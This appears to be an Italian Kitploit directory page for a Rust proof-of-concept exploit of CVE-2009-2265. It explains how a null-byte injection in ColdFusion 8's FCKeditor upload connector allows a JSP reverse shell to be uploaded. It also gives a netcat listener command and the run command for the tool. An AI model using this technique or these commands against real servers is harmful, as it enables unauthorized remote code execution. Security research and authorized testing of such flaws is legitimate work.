Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2009-2265 — Un'implementazione in Rust del POC per l'exploit CVE-2009-2265, che bersaglia Adobe ColdFusion 8. | Kitploit
Strumenti/GitHubGitHub/nika0x38/cve-2009-2265
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubnika0x38/cve-2009-2265

CVE-2009-2265

Un'implementazione in Rust del POC per l'exploit CVE-2009-2265, che bersaglia Adobe ColdFusion 8.

Vedi Repository
111 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2009-2265 - RCE tramite Upload di File su Adobe ColdFusion 8

RustSecurity

Un'implementazione in Rust del POC per l'exploit CVE-2009-2265, mirato ad Adobe ColdFusion 8.


Panoramica della Vulnerabilità

Questa vulnerabilità consente a un utente malintenzionato non autenticato di caricare file arbitrari in una directory accessibile via web su un server che esegue Adobe ColdFusion 8, portando a Remote Code Execution (RCE).

Dettagli Tecnici

  • Vulnerabilità: Directory Traversal tramite Iniezione di Byte Nullo
  • Componente: Connettore FCKeditor upload.cfm
  • Parametro: CurrentFolder
  • Impatto: Remote Code Execution (RCE)
  • Software Affetto: Adobe ColdFusion 8.0.1 e precedenti

  • Descrizione

    La vulnerabilità risiede nella funzionalità di upload di file del componente FCKeditor situato in /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm. Il parametro HTTP GET CurrentFolder non viene sanificato correttamente, consentendo un attacco di iniezione di byte nullo (%00).

    Costruendo una richiesta in cui il parametro CurrentFolder è impostato su /<filename>.jsp%00, un attaccante può bypassare i controlli di estensione lato server. Il sistema sottostante (spesso Java) interpreta il byte nullo come la fine della stringa, trattando il nome del file come <filename>.jsp. Ciò consente all'attaccante di caricare un file JSP dannoso. Il server salva questo file in una directory pubblicamente accessibile (/userfiles/file/), da dove può essere eseguito semplicemente accedendo al suo URL.

    Questo POC automatizza il processo generando un payload di reverse shell JSP, caricandolo utilizzando la vulnerabilità del byte nullo e attivandolo per ottenere una shell sul sistema di destinazione.

    Utilizzo

    Segui questi passaggi per compilare ed eseguire l'exploit.

    Passo 1: Imposta un Listener Netcat

    Prima di eseguire l'exploit, avvia un listener sulla tua macchina locale per catturare la reverse shell in arrivo.

    root@kitploit:~
    
    nc -lnvp <attacker-port>
    
    

    Passo 2: Esegui l'Exploit

    Esegui il binario compilato, fornendo il tuo host/porta locale per la reverse shell e l'host/porta del target remoto.

    root@kitploit:~
    
    cargo run -- --lhost <LHOST> --lport <LPORT> --rhost <RHOST> --rport <RPORT>
    
    

    Dopo che lo script ha attivato il payload, dovresti ricevere una connessione sul tuo listener Netcat.

    Avvertenza

    Questo strumento è destinato esclusivamente a scopi educativi e a test di penetrazione autorizzati. Usalo in modo responsabile e solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione.

    Scarica lo strumento